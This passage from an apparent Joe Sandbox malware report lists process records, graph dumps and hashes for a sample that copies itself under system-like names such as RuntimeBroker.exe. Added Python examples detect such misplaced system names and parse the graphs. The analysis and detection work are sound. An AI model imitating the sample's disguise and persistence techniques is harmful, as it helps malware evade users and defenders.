                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:40
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:41
                                                                                    Start time:12:55:08
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat"
                                                                                    Imagebase:0x7ff703e50000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:42
                                                                                    Start time:12:55:08
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:43
                                                                                    Start time:12:55:08
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:chcp 65001
                                                                                    Imagebase:0x7ff712ed0000
                                                                                    File size:14'848 bytes
                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:44
                                                                                    Start time:12:55:09
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:ping -n 10 localhost
                                                                                    Imagebase:0x7ff6d11e0000
                                                                                    File size:22'528 bytes
                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:45
                                                                                    Start time:12:55:10
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    Imagebase:0x5e0000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:46
                                                                                    Start time:12:55:10
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    Imagebase:0xca0000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:47
                                                                                    Start time:12:55:10
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Program Files\Windows Multimedia Platform\SystemSettings.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
                                                                                    Imagebase:0x1c0000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 79%, ReversingLabs
                                                                                    Has exited:true

                                                                                    Target ID:48
                                                                                    Start time:12:55:11
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Program Files\Windows Multimedia Platform\SystemSettings.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
                                                                                    Imagebase:0x280000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:52
                                                                                    Start time:12:55:17
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                    Imagebase:0x7ff693ab0000
                                                                                    File size:496'640 bytes
                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:53
                                                                                    Start time:12:55:18
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Recovery\USZqVcJFLA.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Recovery\USZqVcJFLA.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:54
                                                                                    Start time:12:55:20
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                                                                                    Imagebase:0xf60000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:55
                                                                                    Start time:12:55:28
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Recovery\USZqVcJFLA.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Recovery\USZqVcJFLA.exe"
                                                                                    Imagebase:0x580000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

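The process records above show one payload (MD5 6689BD9A5C795EEDC631E5FBB850B7FF) running both as C:\Recovery\USZqVcJFLA.exe and as RuntimeBroker.exe under the Windows Photo Viewer directory, which is what the "Drops PE files with benign system names" and "System File Execution Location Anomaly" signatures in the overview are keying on. The following is an added example, not part of the Joe Sandbox report, of the two checks a detection engineer would script over such records: a system-binary name outside the directories where that binary lives, and one hash appearing under several paths. Records 54 and 55 are transcribed from the report; the System32 record and its hash are constructed as a benign control, and the name and directory lists are assumptions for the example.

```python
"""Triage of sandbox process records: flag images that borrow a Windows system
binary name but run from an unexpected directory, and group records by MD5 to
show one payload copied under several names.

Added example, not part of the Joe Sandbox report. Target IDs 54 and 55 are
transcribed from the report; target 99 is a constructed benign control. The
name and directory lists below are assumptions for the example."""
import ntpath
from collections import defaultdict

# Windows binaries that malware commonly impersonates (assumption for the example).
SYSTEM_BINARY_NAMES = {
    "runtimebroker.exe", "svchost.exe", "csrss.exe", "dllhost.exe",
    "winlogon.exe", "lsass.exe", "smss.exe", "explorer.exe",
}

# Directories where those binaries legitimately live (lower-case, no trailing slash).
EXPECTED_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}
WINSXS_PREFIX = r"c:\windows\winsxs\""[:-1]   # r"c:\windows\winsxs\" with a trailing backslash

SAMPLE_RECORDS = [
    # Transcribed from the report's process table.
    {"target_id": 54,
     "path": r"C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe",
     "md5": "6689BD9A5C795EEDC631E5FBB850B7FF"},
    {"target_id": 55,
     "path": r"C:\Recovery\USZqVcJFLA.exe",
     "md5": "6689BD9A5C795EEDC631E5FBB850B7FF"},
    # Constructed benign control: the real RuntimeBroker location with a made-up hash.
    {"target_id": 99,
     "path": r"C:\Windows\System32\RuntimeBroker.exe",
     "md5": "00000000000000000000000000000000"},
]


def is_unexpected_location(path: str) -> bool:
    """True when the file name matches a known system binary but the directory is
    not one of the expected system directories (the 'system file execution
    location anomaly' check). Side-by-side WinSxS copies are tolerated."""
    directory, name = ntpath.split(path.lower())
    if name not in SYSTEM_BINARY_NAMES:
        return False
    return directory not in EXPECTED_DIRS and not directory.startswith(WINSXS_PREFIX)


def find_hash_clusters(records):
    """Map each MD5 seen under more than one path to the sorted list of those paths:
    the same payload being dropped under different names."""
    by_hash = defaultdict(set)
    for rec in records:
        by_hash[rec["md5"].lower()].add(rec["path"])
    return {h: sorted(paths) for h, paths in by_hash.items() if len(paths) > 1}


def triage(records):
    """Return (rule, detail) findings for a record set, location anomalies first."""
    findings = []
    for rec in records:
        if is_unexpected_location(rec["path"]):
            findings.append(("system_name_unexpected_location",
                             f"target {rec['target_id']}: {rec['path']}"))
    for md5, paths in sorted(find_hash_clusters(records).items()):
        findings.append(("same_md5_multiple_paths", f"{md5}: " + " | ".join(paths)))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_RECORDS):
        print(f"[{rule}] {detail}")
```

Run against the three records, the script flags only target 54 for the location check (USZqVcJFLA.exe is not a system name and the System32 control is where RuntimeBroker belongs) and reports the shared MD5 once with both paths. On a live host the same two functions can be fed from `Get-Process | Select Path` plus `Get-FileHash`, with the hash cluster check being the one that survives renaming.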

                                                                                      Execution Graph

                                                                                      Execution Coverage:8.3%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:4
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph (4 nodes)
                                                                                        9324  7ffd9bc48cfc                                -> 9327
                                                                                        9327  7ffd9bc48cff                                -> 9325, 9327 (self-loop)
                                                                                        9325  7ffd9bc48e46  QueryFullProcessImageNameA    -> 9326
                                                                                        9326  7ffd9bc48ea4                                (no successors)

                                                                                      Control-flow Graph

                                                                                      Legend of the rendered graph: • Executed  • Not Executed

                                                                                      control_flow_graph (42 basic blocks; entry block 107, exit block 163; block 159 calls 7ffd9bc53180)
                                                                                        107  7ffd9bc52d3c-7ffd9bc52dd7  -> 111, 112
                                                                                        111  7ffd9bc52e43               -> 113
                                                                                        112  7ffd9bc52dd9-7ffd9bc52de2  -> 111, 114
                                                                                        113  7ffd9bc52e45-7ffd9bc52e6a  -> 121, 122
                                                                                        114  7ffd9bc52de4-7ffd9bc52df0  -> 115, 116
                                                                                        115  7ffd9bc52df2-7ffd9bc52e04  -> 118, 119
                                                                                        116  7ffd9bc52e29-7ffd9bc52e41  -> 113
                                                                                        118  7ffd9bc52e06               -> 119
                                                                                        119  7ffd9bc52e08-7ffd9bc52e1b  -> 119 (self-loop), 120
                                                                                        120  7ffd9bc52e1d-7ffd9bc52e25  -> 116
                                                                                        121  7ffd9bc52e6c-7ffd9bc52e75  -> 122, 123
                                                                                        122  7ffd9bc52ed6               -> 124
                                                                                        123  7ffd9bc52e77-7ffd9bc52e83  -> 125, 126
                                                                                        124  7ffd9bc52ed8-7ffd9bc52efd  -> 130, 131
                                                                                        125  7ffd9bc52ebc-7ffd9bc52ed4  -> 124
                                                                                        126  7ffd9bc52e85-7ffd9bc52e97  -> 128, 129
                                                                                        128  7ffd9bc52e99               -> 129
                                                                                        129  7ffd9bc52e9b-7ffd9bc52eae  -> 129 (self-loop), 132
                                                                                        130  7ffd9bc52eff-7ffd9bc52f09  -> 131, 133
                                                                                        131  7ffd9bc52f6b               -> 134
                                                                                        132  7ffd9bc52eb0-7ffd9bc52eb8  -> 125
                                                                                        133  7ffd9bc52f0b-7ffd9bc52f18  -> 135, 136
                                                                                        134  7ffd9bc52f6d-7ffd9bc52f9b  -> 141, 142
                                                                                        135  7ffd9bc52f51-7ffd9bc52f69  -> 134
                                                                                        136  7ffd9bc52f1a-7ffd9bc52f2c  -> 137, 138
                                                                                        137  7ffd9bc52f2e               -> 138
                                                                                        138  7ffd9bc52f30-7ffd9bc52f43  -> 138 (self-loop), 140
                                                                                        140  7ffd9bc52f45-7ffd9bc52f4d  -> 135
                                                                                        141  7ffd9bc52f9d-7ffd9bc52fa8  -> 142, 144
                                                                                        142  7ffd9bc5300b               -> 143
                                                                                        143  7ffd9bc5300d-7ffd9bc530fa  -> 155, 156
                                                                                        144  7ffd9bc52faa-7ffd9bc52fb8  -> 145, 146
                                                                                        145  7ffd9bc52ff1-7ffd9bc53009  -> 143
                                                                                        146  7ffd9bc52fba-7ffd9bc52fcc  -> 148, 149
                                                                                        148  7ffd9bc52fce               -> 149
                                                                                        149  7ffd9bc52fd0-7ffd9bc52fe3  -> 149 (self-loop), 150
                                                                                        150  7ffd9bc52fe5-7ffd9bc52fed  -> 145
                                                                                        155  7ffd9bc53102-7ffd9bc5311c  -> 159
                                                                                        156  7ffd9bc530fc               -> 155
                                                                                        159  7ffd9bc53125-7ffd9bc53164  call 7ffd9bc53180  -> 163, 164
                                                                                        163  7ffd9bc5316b-7ffd9bc5317f  (no successors)
                                                                                        164  7ffd9bc53166               -> 163
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1913382163.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc40000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce1f8c60f93cbd240ce08b760878b2ad12b022d8a900a2a0986465cbefccaa62
                                                                                      • Instruction ID: cbce71beb79ee4d9837725444c3d5cc36f279f12b0c881dd26aac9ba5800c8b3
                                                                                      • Opcode Fuzzy Hash: ce1f8c60f93cbd240ce08b760878b2ad12b022d8a900a2a0986465cbefccaa62
                                                                                      • Instruction Fuzzy Hash: 06D19170A0CA4D8FEBA8DFA8D8557E977D1FB94311F10422EE80DC7295DF74A9818B81
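Joe Sandbox exports the Execution Graph and Control-flow Graph sections above as a flat token stream rather than a drawing, so the first thing an analyst needs is a parser that turns it back into basic blocks and edges and answers the usual questions: where the function enters and exits, which blocks spin on themselves (the repeated tight loops at 119, 129, 138 and 149 look like the byte-copy or decode loops that precede the call out of block 159), and which blocks carry an API name. The code below is an added example, not tooling from the report. Its token grammar is inferred from the dumps on this page and is an assumption: `<id> <addr>` or `<id> <addr>-<addr>` opens a block, a following `call <addr>` or bare API name annotates that block, and `<src>-><dst>` is an edge. The two sample dumps are copied from this report.

```python
"""Parser for the flat graph dumps Joe Sandbox emits for its Execution Graph and
Control-flow Graph sections, with the checks an analyst runs on them.

Added example, not tooling from the report. Token grammar (an assumption inferred
from the dumps on this page): `<id> <addr>` or `<id> <addr>-<addr>` opens a block,
`call <addr>` or a bare API name annotates it, `<src>-><dst>` is an edge."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")


@dataclass
class Block:
    bid: int
    start: int
    end: int
    annotation: Optional[str] = None          # API name or "call <addr>"
    succ: Set[int] = field(default_factory=set)


def parse_graph(dump: str) -> Dict[int, Block]:
    """Turn one dump line into {block id: Block}; raises on edges to unknown blocks."""
    tokens = dump.split()
    if tokens and tokens[0] in ("execution_graph", "control_flow_graph"):
        tokens = tokens[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    current: Optional[Block] = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            lo, _, hi = tokens[i + 1].partition("-")
            current = Block(int(tok), int(lo, 16), int(hi or lo, 16))
            blocks[current.bid] = current
            i += 2
        elif tok == "call" and current is not None and i + 1 < len(tokens):
            current.annotation = f"call {tokens[i + 1]}"
            i += 2
        elif current is not None:
            current.annotation = tok          # bare API name, e.g. QueryFullProcessImageNameA
            i += 1
        else:
            raise ValueError(f"unexpected token before any block: {tok!r}")
    # Resolve edges only once every block is known: a dangling edge means a damaged dump.
    for src, dst in edges:
        if src not in blocks or dst not in blocks:
            raise ValueError(f"edge {src}->{dst} references an undefined block")
        blocks[src].succ.add(dst)
    return blocks


def entries(blocks: Dict[int, Block]) -> List[int]:
    """Blocks with no predecessor: the function entry (expect exactly one)."""
    targets = {d for b in blocks.values() for d in b.succ}
    return sorted(b.bid for b in blocks.values() if b.bid not in targets)


def sinks(blocks: Dict[int, Block]) -> List[int]:
    """Blocks with no successor: returns, or the point where emulation stopped."""
    return sorted(b.bid for b in blocks.values() if not b.succ)


def self_loops(blocks: Dict[int, Block]) -> List[int]:
    """Blocks that branch to themselves: tight copy/decode loops worth a closer look."""
    return sorted(b.bid for b in blocks.values() if b.bid in b.succ)


def annotated(blocks: Dict[int, Block]) -> Dict[int, str]:
    """Blocks carrying an API name or call target."""
    return {b.bid: b.annotation for b in blocks.values() if b.annotation}


# Sample dumps copied from this report; the long one is split only for readability.
EXECUTION_GRAPH = (
    "execution_graph 9324 7ffd9bc48cfc 9327 7ffd9bc48cff 9324->9327 "
    "9325 7ffd9bc48e46 QueryFullProcessImageNameA 9326 7ffd9bc48ea4 "
    "9325->9326 9327->9325 9327->9327"
)
CONTROL_FLOW_GRAPH = (
    "control_flow_graph 107 7ffd9bc52d3c-7ffd9bc52dd7 111 7ffd9bc52e43 107->111 112 7ffd9bc52dd9-7ffd9bc52de2 107->112 "
    "113 7ffd9bc52e45-7ffd9bc52e6a 111->113 112->111 114 7ffd9bc52de4-7ffd9bc52df0 112->114 121 7ffd9bc52e6c-7ffd9bc52e75 113->121 "
    "122 7ffd9bc52ed6 113->122 115 7ffd9bc52df2-7ffd9bc52e04 114->115 116 7ffd9bc52e29-7ffd9bc52e41 114->116 118 7ffd9bc52e06 115->118 "
    "119 7ffd9bc52e08-7ffd9bc52e1b 115->119 116->113 118->119 119->119 120 7ffd9bc52e1d-7ffd9bc52e25 119->120 120->116 121->122 "
    "123 7ffd9bc52e77-7ffd9bc52e83 121->123 124 7ffd9bc52ed8-7ffd9bc52efd 122->124 125 7ffd9bc52ebc-7ffd9bc52ed4 123->125 "
    "126 7ffd9bc52e85-7ffd9bc52e97 123->126 130 7ffd9bc52eff-7ffd9bc52f09 124->130 131 7ffd9bc52f6b 124->131 125->124 128 7ffd9bc52e99 126->128 "
    "129 7ffd9bc52e9b-7ffd9bc52eae 126->129 128->129 129->129 132 7ffd9bc52eb0-7ffd9bc52eb8 129->132 130->131 133 7ffd9bc52f0b-7ffd9bc52f18 130->133 "
    "134 7ffd9bc52f6d-7ffd9bc52f9b 131->134 132->125 135 7ffd9bc52f51-7ffd9bc52f69 133->135 136 7ffd9bc52f1a-7ffd9bc52f2c 133->136 "
    "141 7ffd9bc52f9d-7ffd9bc52fa8 134->141 142 7ffd9bc5300b 134->142 135->134 137 7ffd9bc52f2e 136->137 138 7ffd9bc52f30-7ffd9bc52f43 136->138 "
    "137->138 138->138 140 7ffd9bc52f45-7ffd9bc52f4d 138->140 140->135 141->142 144 7ffd9bc52faa-7ffd9bc52fb8 141->144 143 7ffd9bc5300d-7ffd9bc530fa 142->143 "
    "155 7ffd9bc53102-7ffd9bc5311c 143->155 156 7ffd9bc530fc 143->156 145 7ffd9bc52ff1-7ffd9bc53009 144->145 146 7ffd9bc52fba-7ffd9bc52fcc 144->146 "
    "145->143 148 7ffd9bc52fce 146->148 149 7ffd9bc52fd0-7ffd9bc52fe3 146->149 148->149 149->149 150 7ffd9bc52fe5-7ffd9bc52fed 149->150 150->145 "
    "159 7ffd9bc53125-7ffd9bc53164 call 7ffd9bc53180 155->159 156->155 163 7ffd9bc5316b-7ffd9bc5317f 159->163 164 7ffd9bc53166 159->164 164->163"
)

if __name__ == "__main__":
    for name, dump in (("execution", EXECUTION_GRAPH), ("control-flow", CONTROL_FLOW_GRAPH)):
        b = parse_graph(dump)
        print(f"{name}: {len(b)} blocks, entry {entries(b)}, exit {sinks(b)}, "
              f"self-loops {self_loops(b)}, annotated {annotated(b)}")
```

On the execution graph this yields four blocks with 9324 as entry, 9326 as exit, 9327 looping on itself and 9325 annotated with QueryFullProcessImageNameA; on the control-flow graph it yields 42 blocks, entry 107, exit 163, self-loops at 119, 129, 138 and 149, and the single out-call from block 159. Edges are resolved after all blocks are read so that a truncated export fails loudly instead of silently dropping edges.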
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 339e12a00d24665c27e20cd9b6e8d0111cd4a2fa58b20888f4ecaf6f9d9084c4
                                                                                      • Instruction ID: 3e1429cd914eb8e0a11360713f7913655d979e3942ed1495aa3cc05310b82d00
                                                                                      • Opcode Fuzzy Hash: 339e12a00d24665c27e20cd9b6e8d0111cd4a2fa58b20888f4ecaf6f9d9084c4
                                                                                      • Instruction Fuzzy Hash: 2A91E371A19A8D8FE758DBACC8697E87BE1FF59300F4101BAE04DC72E6DBB954018740

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1913382163.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc40000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID: FullImageNameProcessQuery
                                                                                      • String ID:
                                                                                      • API String ID: 3578328331-0
                                                                                      • Opcode ID: 3d3905dd11a78de664962b8d1e06f5d7ccfd9010cf49370e33d41b476ebee9bf
                                                                                      • Instruction ID: 91f34c7dc99585e7415ce2c03a5c2ea5901dcb385e6a321ee925012fb3bc1d47
                                                                                      • Opcode Fuzzy Hash: 3d3905dd11a78de664962b8d1e06f5d7ccfd9010cf49370e33d41b476ebee9bf
                                                                                      • Instruction Fuzzy Hash: 04718230619A4D8FEB68DF68D8557F937D2FB58311F10423EE84EC7291CB75A9418B81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8a0de534f2c7438ce605c5c0e617ac0caf98298bec52279bd9df5c43c6b9be34
                                                                                      • Instruction ID: f8144fe43113670ba1901d2c4a23eefaf0acaf2bcb80cb0a6a348224b14415df
                                                                                      • Opcode Fuzzy Hash: 8a0de534f2c7438ce605c5c0e617ac0caf98298bec52279bd9df5c43c6b9be34
                                                                                      • Instruction Fuzzy Hash: 94713811F2EA4E0AE77966BC18652B976C2DF8AB14F2602BDD4DFC32D3DC1C69034241
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3fd967680c5a6fe5d02ff454c1fcce96bc3ea8ac53acc8131179400ba52de2c0
                                                                                      • Instruction ID: 4b9ff08e4554348134e3343328bdf4251a671a07f0b913099651b989a9fa2318
                                                                                      • Opcode Fuzzy Hash: 3fd967680c5a6fe5d02ff454c1fcce96bc3ea8ac53acc8131179400ba52de2c0
                                                                                      • Instruction Fuzzy Hash: 32514C32F1DA5C4FD764DBBC88656B97BE1FF4E311B0501BBE09AD32A2DE2498018741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43c2ba52ca6d3c463901b5fd656cd98f1f5a9a08f86c195e80a586e1303de619
                                                                                      • Instruction ID: 68754dc5b6ed80d2cd869a0e641b43e8dbb83e15927cd5f41b60b5942778842a
                                                                                      • Opcode Fuzzy Hash: 43c2ba52ca6d3c463901b5fd656cd98f1f5a9a08f86c195e80a586e1303de619
                                                                                      • Instruction Fuzzy Hash: BA318033A1E6980FE721A7BCA8654FA3FE0EF4A239B0501BBE4C9C7193DD1490474691
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b83171e35b6ddd6957151b6625b759114df4ee37cee72769cb555f9d083366ba
                                                                                      • Instruction ID: 7d179a3453cd91e0477defeece0afe641e731a6d0f6fe1b5b7791393e053e7bf
                                                                                      • Opcode Fuzzy Hash: b83171e35b6ddd6957151b6625b759114df4ee37cee72769cb555f9d083366ba
                                                                                      • Instruction Fuzzy Hash: C8313A21B4CA1D4FE758BBAC686AAF573C1DF59361B0540FAE40EC32E7DD98AC414285
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 34f622d49ff1764f8fb26c8cffe9c7a2c9946e2f6351d1c3e7414ea144b06642
                                                                                      • Instruction ID: 7a9a1465059d3f67e163183f85aaa696657f8da60db2ab99a93ec99a89d1a058
                                                                                      • Opcode Fuzzy Hash: 34f622d49ff1764f8fb26c8cffe9c7a2c9946e2f6351d1c3e7414ea144b06642
                                                                                      • Instruction Fuzzy Hash: 7C319033A1E6980FD721B7BC58654FA3FD0EF4A239B0501BBE0C9C6193DD1490468291
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 61526945a127d12d54bbaa93dfd92aa104ded1af4f4e0405e5b410db569047d4
                                                                                      • Instruction ID: 38bf07c0805b8d1e671afc1237ce10244a8c523988fc29d904116a7891072a68
                                                                                      • Opcode Fuzzy Hash: 61526945a127d12d54bbaa93dfd92aa104ded1af4f4e0405e5b410db569047d4
                                                                                      • Instruction Fuzzy Hash: C5218F32A1D7980FD721B7BC58654FA3FE0EF4A239B0401BBE0D9C6193D92490468791
                                                                                      Memory Dump Source
